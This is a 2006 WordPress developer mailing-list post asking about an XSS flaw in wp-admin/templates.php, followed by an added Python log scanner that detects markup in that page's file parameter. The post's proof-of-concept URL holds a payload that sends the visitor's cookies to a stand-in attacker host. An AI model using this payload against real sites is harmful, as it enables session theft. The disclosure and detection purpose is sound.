[wp-hackers] Xss Vulnerability
dabos
daboslab at gmail.com
Thu Dec 28 14:56:39 GMT 2006
Hi guys. Can you tell me more about this XSS vulnerability for WP 2.0.5 in
wp-admin/templates.php?
Proof of concept:
https://blogsite/wp/wp-admin/templates.php?file=<img src=""onerror=javascript:document.location.href='http://evilhacker/capturecookie.php?'+document.cookie;>
Is this the solution: http://trac.wordpress.org/changeset/4665 ?
One last question: when will the 2.0.6 final version be released? Isn't this
vulnerability in 2.0.6 RC 1?
Dario Salvelli - ICT Junior Student, Italy
Web Site/Blog: www.dariosalvelli.com
Contact:
Gtalk - dariosalvelli-at-gmail-dot-com
Msn - el_cantore-at-hotmail-dot-it
Skype - dariosalvelli
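
An added example, not part of the original message and not WordPress code: a log check a site owner could run to see whether requests to wp-admin/templates.php carried HTML markup in the `file` parameter, as in the proof of concept above. The log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Characters a template file name never needs but HTML injection does.
MARKUP = re.compile(r"[<>\"'`]")
# Request field of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, harmless markup).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Dec/2006:14:01:02 +0000] '
    '"GET /wp/wp-admin/templates.php?file=index.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Dec/2006:14:03:10 +0000] '
    '"GET /wp/wp-admin/templates.php?file=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5300',
    '203.0.113.9 - - [28/Dec/2006:14:03:44 +0000] '
    '"GET /wp/wp-admin/templates.php?file=%253Cb%253Etest HTTP/1.1" 200 5290',
    '203.0.113.7 - - [28/Dec/2006:14:05:00 +0000] '
    '"GET /wp/wp-admin/post.php?file=%3Cb%3E HTTP/1.1" 200 4100',
]

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_file_params(log_lines):
    """Return (line_no, decoded_value) for templates.php requests whose
    `file` parameter contains HTML metacharacters."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/wp-admin/templates.php"):
            continue
        # parse_qs removes one layer of percent-encoding; decode_fully the rest.
        for raw in parse_qs(url.query, keep_blank_values=True).get("file", []):
            value = decode_fully(raw)
            if MARKUP.search(value):
                hits.append((n, value))
    return hits

if __name__ == "__main__":
    for line_no, value in suspicious_file_params(SAMPLE_LOG):
        print(f"line {line_no}: file={value!r}")
```

A hit only shows that markup was sent in the parameter; whether it was reflected unescaped depends on the WordPress version serving the page.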